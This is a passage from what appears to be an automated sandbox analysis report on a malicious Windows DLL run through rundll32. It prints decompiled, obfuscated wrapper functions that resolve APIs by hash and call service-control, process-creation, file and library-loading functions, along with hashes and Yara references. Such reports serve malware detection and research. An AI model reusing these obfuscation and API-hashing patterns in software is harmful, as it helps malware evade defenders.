				_v8 = _v8 ^ 0x0005552e;
				_push(0x21ce39be);
				_push(0xb53dc03);
				_push(_t42);
				_push(_t42);
				_t43 = 0x15;
				E10002309(_t43);
				_t41 = OpenSCManagerW(0, 0, _a16); // executed
				return _t41;
			}

0x1001fea4
0x1001fea9
0x1001feaa
0x1001fead
0x1001feb1
0x1001feb2
0x1001feb7
0x1001fec1
0x1001fec8
0x1001fecb
0x1001fed2
0x1001fed9
0x1001fee0
0x1001fee7
0x1001feee
0x1001fef5
0x1001fefc
0x1001ff03
0x1001ff0a
0x1001ff11
0x1001ff18
0x1001ff1c
0x1001ff2f
0x1001ff35
0x1001ff3a
0x1001ff3b
0x1001ff3e
0x1001ff3f
0x1001ff4c
0x1001ff52

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,10015191,?,?,?,?,?,?,?,?,?,?,0EB411AB), ref: 1001FF4C

Strings

OMk, xrefs: 1001FEC1

Memory Dump Source

Source File: 00000005.00000002.364212985.0000000010001000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.364203033.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.364266581.0000000010025000.00000004.00000001.sdmp Download File

Similarity

API ID: ManagerOpen
String ID: OMk
API String ID: 1889721586-456170103
Opcode ID: d1e283b7febcfdf4bdf6f7a65a9942aadab0ed956acd7b7642cec6b73cd3d803
Instruction ID: 1d80d5bf462f7d76a803e315767f53b854081a7213ef634c08bc69ad92fa0287
Opcode Fuzzy Hash: d1e283b7febcfdf4bdf6f7a65a9942aadab0ed956acd7b7642cec6b73cd3d803
Instruction Fuzzy Hash: 6D1113B2C0022CBBEB11DFA5D94A8EFBFB4EF44318F108188E91466201D3B95B149B91

Uniqueness

Uniqueness Score: -1.00%

Function 100231D2, Relevance: 1.6, APIs: 1, Instructions: 77
processCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E100231D2(void* __ecx, WCHAR* __edx, intOrPtr _a8, intOrPtr _a12, WCHAR* _a16, struct _STARTUPINFOW* _a28, intOrPtr _a32, intOrPtr _a36, struct _PROCESS_INFORMATION* _a48, int _a52, intOrPtr _a56) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				struct _SECURITY_ATTRIBUTES* _v24;
				intOrPtr _v28;
				void* _t54;
				int _t63;
				signed int _t65;
				WCHAR* _t71;

				_push(_a56);
				_t71 = __edx;
				_push(_a52);
				_push(_a48);
				_push(0);
				_push(0);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(0);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(0);
				_push(__edx);
				E10022523(_t54);
				_v28 = 0x2cec17;
				_v24 = 0;
				_v16 = 0x5aadab;
				_v16 = _v16 << 3;
				_v16 = _v16 >> 0xc;
				_v16 = _v16 ^ 0x000031a8;
				_v12 = 0x82119f;
				_v12 = _v12 >> 2;
				_v12 = _v12 + 0xffff09c3;
				_t65 = 0x25;
				_v12 = _v12 / _t65;
				_v12 = _v12 ^ 0x0004d7f2;
				_v8 = 0x7cd8a6;
				_v8 = _v8 >> 6;
				_v8 = _v8 | 0x702a8e48;
				_v8 = _v8 + 0xffff37f0;
				_v8 = _v8 ^ 0x702d019b;
				_v20 = 0x367fb2;
				_v20 = _v20 + 0xffff7ba2;
				_v20 = _v20 ^ 0x003ae9c9;
				E10002309(0x2e4, _t65, _t65, 0xbf8568a3, _t65, 0x9c9047d0);
				_t63 = CreateProcessW(_t71, _a16, 0, 0, _a52, 0, 0, 0, _a28, _a48); // executed
				return _t63;
			}

APIs

CreateProcessW.KERNEL32(000C0354,?,00000000,00000000,?,00000000,00000000,00000000,229292B4,?), ref: 100232BB

Memory Dump Source

Source File: 00000005.00000002.364212985.0000000010001000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.364203033.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.364266581.0000000010025000.00000004.00000001.sdmp Download File

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 1c884f6c38555fd1f2acfe04ef4172838376d53041689723563821acbd5a938d
Instruction ID: db286c9e9bcad3bd2e87b522c53d89c9dfc5ed19f2ace101bae5327955dfaec9
Opcode Fuzzy Hash: 1c884f6c38555fd1f2acfe04ef4172838376d53041689723563821acbd5a938d
Instruction Fuzzy Hash: 21311476801248BBCF65DF96CD49CDFBFB5FB89704F108188F914A6220D3B58A60DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 1001199D, Relevance: 1.6, APIs: 1, Instructions: 71
fileCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E1001199D(void* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, long _a20, long _a24, long _a28, long _a32, intOrPtr _a36) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t55;
				void* _t68;
				signed int _t69;
				signed int _t70;

				_push(0);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				E10022523(_t55);
				_v12 = 0xd4f63c;
				_v12 = _v12 >> 7;
				_v12 = _v12 << 0xf;
				_v12 = _v12 + 0xffffff46;
				_v12 = _v12 ^ 0xd4fb5fe8;
				_v8 = 0x967d18;
				_v8 = _v8 + 0xffffef98;
				_t69 = 0x14;
				_v8 = _v8 / _t69;
				_t70 = 0x4a;
				_v8 = _v8 / _t70;
				_v8 = _v8 ^ 0x000a0722;
				_v20 = 0x4653bc;
				_v20 = _v20 * 0x70;
				_v20 = _v20 ^ 0x1ec2604c;
				_v16 = 0x7577a9;
				_v16 = _v16 * 0x3c;
				_v16 = _v16 ^ 0x1b87e59a;
				E10002309(0x10a, _t70, _t70, 0xb484d458, _t70, 0x9c9047d0);
				_t68 = CreateFileW(_a4, _a24, _a28, 0, _a32, _a20, 0); // executed
				return _t68;
			}

0x100119a6
0x100119a7
0x100119aa
0x100119ad
0x100119b0
0x100119b3
0x100119b6
0x100119b9
0x100119bc
0x100119bf
0x100119c3
0x100119c4
0x100119c9
0x100119d3
0x100119d9
0x100119dd
0x100119e4
0x100119eb
0x100119f2
0x100119fe
0x10011a03
0x10011a0b
0x10011a13
0x10011a16
0x10011a1d
0x10011a30
0x10011a38
0x10011a3f
0x10011a4a
0x10011a4d
0x10011a60
0x10011a79
0x10011a7f

APIs

CreateFileW.KERNEL32(D4FB5FE8,?,?,00000000,?,?,00000000), ref: 10011A79

Memory Dump Source

Source File: 00000005.00000002.364212985.0000000010001000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.364203033.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.364266581.0000000010025000.00000004.00000001.sdmp Download File

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 8a2d25935346c61c613306e80470cb2899605f47af9ce82126dccb95390cfdca
Instruction ID: 4460bfc2ec69cb6a9c9d4ae8ab6b4977e7447a0d843199ae8caee7af6f2384ce
Opcode Fuzzy Hash: 8a2d25935346c61c613306e80470cb2899605f47af9ce82126dccb95390cfdca
Instruction Fuzzy Hash: E021E27280021DFBDF05CF95D8498DEBFB6EF49354F108188F91466260D3B69A61AF90

Uniqueness

Uniqueness Score: -1.00%

Function 10002985, Relevance: 1.6, APIs: 1, Instructions: 58
memoryCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E10002985(long __ecx, long __edx, intOrPtr _a4, void* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				void* _t43;
				void* _t53;
				signed int _t55;
				long _t60;
				long _t61;

				_push(_a12);
				_t60 = __edx;
				_t61 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E10022523(_t43);
				_v20 = 0x610f25;
				_v20 = _v20 ^ 0x98bdb346;
				_v20 = _v20 >> 3;
				_v20 = _v20 ^ 0x13199c72;
				_v16 = 0x24641b;
				_t55 = 0x72;
				_v16 = _v16 * 0x35;
				_v16 = _v16 ^ 0xfebd96de;
				_v16 = _v16 ^ 0xf931a9e3;
				_v12 = 0x6331a9;
				_v12 = _v12 >> 0xb;
				_v12 = _v12 / _t55;
				_v12 = _v12 ^ 0x0006f398;
				_v8 = 0x8145a8;
				_v8 = _v8 >> 0xa;
				_v8 = _v8 << 0xd;
				_v8 = _v8 + 0x8268;
				_v8 = _v8 ^ 0x0405b518;
				E10002309(_t55 + 0x5d, _t55, _t55, 0x9d19c04e, _t55, 0x9c9047d0);
				_t53 = RtlAllocateHeap(_a8, _t60, _t61); // executed
				return _t53;
			}

0x1000298d
0x10002990
0x10002992
0x10002994
0x10002997
0x1000299a
0x1000299b
0x1000299c
0x100029a1
0x100029ab
0x100029b4
0x100029b8
0x100029bf
0x100029cc
0x100029d3
0x100029d6
0x100029dd
0x100029e4
0x100029eb
0x100029f9
0x100029fc
0x10002a03
0x10002a0a
0x10002a0e
0x10002a12
0x10002a19
0x10002a31
0x10002a3e
0x10002a45

APIs

RtlAllocateHeap.NTDLL(F931A9E3,01AD2A76,65B9EDAF,?,?,?,?,?,?,?,?,00000000,229292B5), ref: 10002A3E

Memory Dump Source

Source File: 00000005.00000002.364212985.0000000010001000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.364203033.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.364266581.0000000010025000.00000004.00000001.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 138a33bbf657fc90b6a1f11ed01e494c992cf007267dd6aff1ee16601a01d635
Instruction ID: a28c389faf7b726d87918facb3c60479c9af1eed29e3a2ef13c7030710ba699e
Opcode Fuzzy Hash: 138a33bbf657fc90b6a1f11ed01e494c992cf007267dd6aff1ee16601a01d635
Instruction Fuzzy Hash: 84215372C00208BBDF18CFA8D84A8DEBFB5FB41710F108098E824A6210E3B4AB14DF90

Uniqueness

Uniqueness Score: -1.00%

Function 1001A1D9, Relevance: 1.6, APIs: 1, Instructions: 57
serviceCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E1001A1D9(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, void* _a12, int _a16, short* _a20) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				void* _t48;
				void* _t60;
				signed int _t62;

				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				E10022523(_t48);
				_v28 = _v28 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v32 = 0xc7e348;
				_v20 = 0x108854;
				_v20 = _v20 + 0xffffaa5a;
				_v20 = _v20 ^ 0x0016e205;
				_v12 = 0x2fa6a1;
				_v12 = _v12 ^ 0x32ad7830;
				_t62 = 5;
				_v12 = _v12 * 0x54;
				_v12 = _v12 ^ 0x92f839ec;
				_v16 = 0x6695de;
				_v16 = _v16 * 0x61;
				_v16 = _v16 ^ 0x26d3982b;
				_v8 = 0xfe457a;
				_v8 = _v8 * 0x1c;
				_v8 = _v8 / _t62;
				_v8 = _v8 + 0xffffd7e2;
				_v8 = _v8 ^ 0x058c81d4;
				E10002309(0x229, _t62, _t62, 0x540b902b, _t62, 0x21ce39be);
				_t60 = OpenServiceW(_a12, _a20, _a16); // executed
				return _t60;
			}

0x1001a1df
0x1001a1e2
0x1001a1e5
0x1001a1e8
0x1001a1eb
0x1001a1f0
0x1001a1f5
0x1001a1fc
0x1001a202
0x1001a209
0x1001a210
0x1001a217
0x1001a21e
0x1001a225
0x1001a232
0x1001a239
0x1001a23c
0x1001a243
0x1001a255
0x1001a258
0x1001a25f
0x1001a26a
0x1001a277
0x1001a27a
0x1001a281
0x1001a294
0x1001a2a5
0x1001a2aa

APIs

OpenServiceW.ADVAPI32(0016E205,00000000,00000000), ref: 1001A2A5

Memory Dump Source

Source File: 00000005.00000002.364212985.0000000010001000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.364203033.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.364266581.0000000010025000.00000004.00000001.sdmp Download File

Similarity

API ID: OpenService
String ID:
API String ID: 3098006287-0
Opcode ID: 840192035c919cdef4810d782994658ce17bfcf84a61f68bdcf29756b0cc9f76
Instruction ID: fedd1cc606632efae3d400c93a220e8e98036f636a1aec4a19a6fd3869fc071c
Opcode Fuzzy Hash: 840192035c919cdef4810d782994658ce17bfcf84a61f68bdcf29756b0cc9f76
Instruction Fuzzy Hash: 122128B1C0020DFFCF04CFE8D946AAEBBB5EB44300F108199E914A6260D7715B549F50

Uniqueness

Uniqueness Score: -1.00%

Function 10017708, Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 100177B6

Memory Dump Source

Source File: 00000005.00000002.364212985.0000000010001000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.364203033.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.364266581.0000000010025000.00000004.00000001.sdmp Download File

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 793664888eb73d009d9e5b6ba31e7172053ff3348b2e2b85015c814eee7fae41
Instruction ID: e01db37ee4e11aec0ed8fe9f4a455c9f05bd25de310d07c039ce80a3f7d39afa
Opcode Fuzzy Hash: 793664888eb73d009d9e5b6ba31e7172053ff3348b2e2b85015c814eee7fae41
Instruction Fuzzy Hash: CC1134B6D00209FBDB08CFA4D94A9AEBBB4FF44304F108189E814AB251E3B09B108F91

Uniqueness

Uniqueness Score: -1.00%

Function 10004248, Relevance: 1.5, APIs: 1, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10004248() {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _t52;
				signed int _t53;

				_v24 = _v24 & 0x00000000;
				_v32 = 0xac8d12;
				_v28 = 0x59a528;
				_v12 = 0xae5295;
				_v12 = _v12 << 2;
				_t52 = 0xb;
				_v12 = _v12 / _t52;
				_v12 = _v12 ^ 0x0038a8c1;
				_v20 = 0xfd2184;
				_v20 = _v20 ^ 0xb7361747;
				_v20 = _v20 ^ 0xb7cc531f;
				_v8 = 0xac9b8;
				_t53 = 9;
				_v8 = _v8 / _t53;
				_v8 = _v8 << 0xd;
				_v8 = _v8 >> 0xd;
				_v8 = _v8 ^ 0x00077309;
				_v16 = 0x4164cf;
				_v16 = _v16 << 2;
				_v16 = _v16 ^ 0x010bebe7;
				E10002309(0x37f, _t53, _t53, 0x8b1a77d6, _t53, 0x9c9047d0);
				ExitProcess(0);
			}

APIs

ExitProcess.KERNEL32(00000000), ref: 100042F1

Memory Dump Source

Source File: 00000005.00000002.364212985.0000000010001000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.364203033.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.364266581.0000000010025000.00000004.00000001.sdmp Download File

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 11cce549a584f233032fc040f1d8beaa3eb6087a0dfae4806d5bd7ccc63cf562
Instruction ID: dec05fa3737df580d58ff145636bc0451a72c06ba1d5dcadd23311741e886f9d
Opcode Fuzzy Hash: 11cce549a584f233032fc040f1d8beaa3eb6087a0dfae4806d5bd7ccc63cf562
Instruction Fuzzy Hash: B91128B5E00208EBDB44DFE5D94AADEBBF1FB44308F208089E515A7240D7B45B18CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 1001A566, Relevance: 1.5, APIs: 1, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E1001A566(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t31;
				int _t39;

				_push(_a4);
				_push(__ecx);
				E10022523(_t31);
				_v20 = 0xa80c31;
				_v20 = _v20 * 0x6c;
				_v20 = _v20 ^ 0x46e6f799;
				_v16 = 0x35d7e6;
				_v16 = _v16 << 0xd;
				_v16 = _v16 ^ 0xbafefac0;
				_v12 = 0x55f9ae;
				_v12 = _v12 + 0xffffbfa6;
				_v12 = _v12 | 0xf8d2795e;
				_v12 = _v12 ^ 0xf8daa7f9;
				_v8 = 0xe46cfe;
				_v8 = _v8 ^ 0xeb94df75;
				_v8 = _v8 | 0xf69b0666;
				_v8 = _v8 ^ 0xfffa92dc;
				E10002309(0x148, __ecx, __ecx, 0x2237d547, __ecx, 0x9c9047d0);
				_t39 = FindCloseChangeNotification(_a4); // executed
				return _t39;
			}

0x1001a56c
0x1001a570
0x1001a571
0x1001a576
0x1001a58a
0x1001a58d
0x1001a594
0x1001a59b
0x1001a59f
0x1001a5a6
0x1001a5ad
0x1001a5b4
0x1001a5bb
0x1001a5c2
0x1001a5c9
0x1001a5d0
0x1001a5d7
0x1001a5f6
0x1001a601
0x1001a606

APIs

FindCloseChangeNotification.KERNEL32(F8DAA7F9), ref: 1001A601

Memory Dump Source

Source File: 00000005.00000002.364212985.0000000010001000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.364203033.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.364266581.0000000010025000.00000004.00000001.sdmp Download File

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 2512bc8cf98a9556459c8d1695ff192ee3e01f460f93b2f36ca59e351fe401b9
Instruction ID: 916d80f1436c55e495bde87e87ea32654bf5eec04e964754689aa7ec780072d2
Opcode Fuzzy Hash: 2512bc8cf98a9556459c8d1695ff192ee3e01f460f93b2f36ca59e351fe401b9
Instruction Fuzzy Hash: 1F11F3B5C1030DFBCB18DFE8D8869AEBBB4EF44304F108698A855A6261D3B56B158F91

Uniqueness

Uniqueness Score: -1.00%

Function 100117CB, Relevance: 1.3, APIs: 1, Instructions: 56
stringCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E100117CB(WCHAR* __ecx, void* __edx, intOrPtr _a4, WCHAR* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t44;
				int _t55;
				signed int _t57;
				WCHAR* _t62;

				_push(_a8);
				_t62 = __ecx;
				_push(_a4);
				_push(__ecx);
				E10022523(_t44);
				_v24 = _v24 & 0x00000000;
				_v32 = 0x2c5dd9;
				_v28 = 0x29a411;
				_v16 = 0xb6013c;
				_v16 = _v16 >> 2;
				_v16 = _v16 << 5;
				_v16 = _v16 ^ 0x05bceb0d;
				_v12 = 0xa7496a;
				_t57 = 7;
				_v12 = _v12 * 0x55;
				_v12 = _v12 | 0x1a205192;
				_v12 = _v12 ^ 0x3fab9f8f;
				_v8 = 0xf5055a;
				_v8 = _v8 / _t57;
				_v8 = _v8 + 0xa16;
				_v8 = _v8 * 0x7e;
				_v8 = _v8 ^ 0x1132ba81;
				_v20 = 0xaea409;
				_v20 = _v20 << 6;
				_v20 = _v20 ^ 0x2ba3ef66;
				E10002309(0xb8, _t57, _t57, 0xbf157248, _t57, 0x9c9047d0);
				_t55 = lstrcmpiW(_t62, _a8); // executed
				return _t55;
			}

APIs

lstrcmpiW.KERNEL32(?,05BCEB0D,?,?,?,?,?,?,?,?,00000000), ref: 1001188D

Memory Dump Source

Source File: 00000005.00000002.364212985.0000000010001000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.364203033.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.364266581.0000000010025000.00000004.00000001.sdmp Download File

Similarity

API ID: lstrcmpi
String ID:
API String ID: 1586166983-0
Opcode ID: d112a349bd06866e322501f938da4f729aeb5c72f8ac7eafb21e1b49d57e3827
Instruction ID: 1774797ce17004cd69ed458787da8d3b2b53829bebfee28bf73c73f1d8c62a15
Opcode Fuzzy Hash: d112a349bd06866e322501f938da4f729aeb5c72f8ac7eafb21e1b49d57e3827
Instruction Fuzzy Hash: 652127B5D0020CFFDB04DFA4D94A9EEBBB4EB44304F108189E425B7240E3B56B049F91

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 6240 Parent PID: 580 rundll32.exeCOMMON

Executed Functions

Function 1001F790, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 47
fileCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E1001F790(void* __ecx, void* __edx, intOrPtr _a4, WCHAR* _a8, intOrPtr _a12) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				void* _t39;
				int _t48;
				signed int _t50;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E10022523(_t39);
				_v20 = 0x305f8e;
				_v20 = _v20 << 0x10;
				_v20 = _v20 ^ 0x5f829bc1;
				_v12 = 0x22b27e;
				_v12 = _v12 >> 6;
				_v12 = _v12 + 0x22ee;
				_v12 = _v12 ^ 0x000c4601;
				_v8 = 0xcd41e2;
				_v8 = _v8 + 0xd868;
				_v8 = _v8 + 0xd31f;
				_t50 = 0x5f;
				_v8 = _v8 / _t50;
				_v8 = _v8 ^ 0x000a754c;
				_v16 = 0x592d24;
				_v16 = _v16 | 0x8ee4cdff;
				_v16 = _v16 ^ 0x8efaae11;
				E10002309(_t50 + 0x2c, _t50, _t50, 0x7c50bf37, _t50, 0x9c9047d0);
				_t48 = DeleteFileW(_a8); // executed
				return _t48;
			}

APIs

DeleteFileW.KERNEL32(8EFAAE11), ref: 1001F839

Strings

", xrefs: 1001F7C8
$-Y, xrefs: 1001F802
Lu, xrefs: 1001F81A
Lu, xrefs: 1001F7EB

Memory Dump Source

Source File: 00000006.00000002.362621006.0000000010001000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.362610242.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.362690666.0000000010025000.00000004.00000001.sdmp Download File

Similarity

API ID: DeleteFile
String ID: $-Y$Lu$Lu$"
API String ID: 4033686569-1114282491
Opcode ID: 79e79a46e8f2bc5455ac9c56fc484e8236daa8409ea2d6f81888c9965c792b55
Instruction ID: 543db5e143fc82e0febe4e5b84228ca4fb2f9e33671b133290cd188315d44989
Opcode Fuzzy Hash: 79e79a46e8f2bc5455ac9c56fc484e8236daa8409ea2d6f81888c9965c792b55
Instruction Fuzzy Hash: 7911F5B6C00208FBDF09DFE4CC4A9AEBBB5FB54318F108588E915AA251D3B59B649F50

Uniqueness

Uniqueness Score: -1.00%

Function 1001FE9D, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 26%

			E1001FE9D(void* __edx, intOrPtr _a4, intOrPtr _a8, int _a16) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				short* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* __ecx;
				void* _t34;
				void* _t41;
				void* _t43;

				_push(_a16);
				_push(0);
				_push(_a8);
				_push(_a4);
				_push(0);
				E10022523(_t34);
				_v32 = 0xfebeef;
				_v28 = 0x6b4d4f;
				_v24 = 0;
				_v20 = 0x72d4d3;
				_v20 = _v20 + 0x7ce2;
				_v20 = _v20 ^ 0x0072d8bc;
				_v16 = 0x618a6;
				_v16 = _v16 + 0x2ac;
				_v16 = _v16 ^ 0x00083b16;
				_v12 = 0x17740f;
				_v12 = _v12 + 0x9d82;
				_v12 = _v12 ^ 0x0012bdfc;
				_v8 = 0xba692b;
				_v8 = _v8 ^ 0x31422697;
				_v8 = _v8 >> 0x10;
				_v8 = _v8 ^ 0x0005552e;
				_push(0x21ce39be);
				_push(0xb53dc03);
				_push(_t42);
				_push(_t42);
				_t43 = 0x15;
				E10002309(_t43);
				_t41 = OpenSCManagerW(0, 0, _a16); // executed
				return _t41;
			}

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,10015191,?,?,?,?,?,?,?,?,?,?,0EB411AB), ref: 1001FF4C

Strings

OMk, xrefs: 1001FEC1

Memory Dump Source

Source File: 00000006.00000002.362621006.0000000010001000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.362610242.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.362690666.0000000010025000.00000004.00000001.sdmp Download File

Similarity

API ID: ManagerOpen
String ID: OMk
API String ID: 1889721586-456170103
Opcode ID: d1e283b7febcfdf4bdf6f7a65a9942aadab0ed956acd7b7642cec6b73cd3d803
Instruction ID: 1d80d5bf462f7d76a803e315767f53b854081a7213ef634c08bc69ad92fa0287
Opcode Fuzzy Hash: d1e283b7febcfdf4bdf6f7a65a9942aadab0ed956acd7b7642cec6b73cd3d803
Instruction Fuzzy Hash: 6D1113B2C0022CBBEB11DFA5D94A8EFBFB4EF44318F108188E91466201D3B95B149B91

Uniqueness

Uniqueness Score: -1.00%

Function 1001199D, Relevance: 1.6, APIs: 1, Instructions: 71
fileCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E1001199D(void* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, long _a20, long _a24, long _a28, long _a32, intOrPtr _a36) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t55;
				void* _t68;
				signed int _t69;
				signed int _t70;

				_push(0);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				E10022523(_t55);
				_v12 = 0xd4f63c;
				_v12 = _v12 >> 7;
				_v12 = _v12 << 0xf;
				_v12 = _v12 + 0xffffff46;
				_v12 = _v12 ^ 0xd4fb5fe8;
				_v8 = 0x967d18;
				_v8 = _v8 + 0xffffef98;
				_t69 = 0x14;
				_v8 = _v8 / _t69;
				_t70 = 0x4a;
				_v8 = _v8 / _t70;
				_v8 = _v8 ^ 0x000a0722;
				_v20 = 0x4653bc;
				_v20 = _v20 * 0x70;
				_v20 = _v20 ^ 0x1ec2604c;
				_v16 = 0x7577a9;
				_v16 = _v16 * 0x3c;
				_v16 = _v16 ^ 0x1b87e59a;
				E10002309(0x10a, _t70, _t70, 0xb484d458, _t70, 0x9c9047d0);
				_t68 = CreateFileW(_a4, _a24, _a28, 0, _a32, _a20, 0); // executed
				return _t68;
			}

APIs

CreateFileW.KERNEL32(D4FB5FE8,?,?,00000000,?,?,00000000), ref: 10011A79

Memory Dump Source

Source File: 00000006.00000002.362621006.0000000010001000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.362610242.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.362690666.0000000010025000.00000004.00000001.sdmp Download File

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 8a2d25935346c61c613306e80470cb2899605f47af9ce82126dccb95390cfdca
Instruction ID: 4460bfc2ec69cb6a9c9d4ae8ab6b4977e7447a0d843199ae8caee7af6f2384ce
Opcode Fuzzy Hash: 8a2d25935346c61c613306e80470cb2899605f47af9ce82126dccb95390cfdca
Instruction Fuzzy Hash: E021E27280021DFBDF05CF95D8498DEBFB6EF49354F108188F91466260D3B69A61AF90

Uniqueness

Uniqueness Score: -1.00%

Function 10017708, Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 100177B6

Memory Dump Source

Source File: 00000006.00000002.362621006.0000000010001000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.362610242.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.362690666.0000000010025000.00000004.00000001.sdmp Download File

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 793664888eb73d009d9e5b6ba31e7172053ff3348b2e2b85015c814eee7fae41
Instruction ID: e01db37ee4e11aec0ed8fe9f4a455c9f05bd25de310d07c039ce80a3f7d39afa
Opcode Fuzzy Hash: 793664888eb73d009d9e5b6ba31e7172053ff3348b2e2b85015c814eee7fae41
Instruction Fuzzy Hash: CC1134B6D00209FBDB08CFA4D94A9AEBBB4FF44304F108189E814AB251E3B09B108F91

Uniqueness

Uniqueness Score: -1.00%

Function 10004248, Relevance: 1.5, APIs: 1, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10004248() {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _t52;
				signed int _t53;

				_v24 = _v24 & 0x00000000;
				_v32 = 0xac8d12;
				_v28 = 0x59a528;
				_v12 = 0xae5295;
				_v12 = _v12 << 2;
				_t52 = 0xb;
				_v12 = _v12 / _t52;
				_v12 = _v12 ^ 0x0038a8c1;
				_v20 = 0xfd2184;
				_v20 = _v20 ^ 0xb7361747;
				_v20 = _v20 ^ 0xb7cc531f;
				_v8 = 0xac9b8;
				_t53 = 9;
				_v8 = _v8 / _t53;
				_v8 = _v8 << 0xd;
				_v8 = _v8 >> 0xd;
				_v8 = _v8 ^ 0x00077309;
				_v16 = 0x4164cf;
				_v16 = _v16 << 2;
				_v16 = _v16 ^ 0x010bebe7;
				E10002309(0x37f, _t53, _t53, 0x8b1a77d6, _t53, 0x9c9047d0);
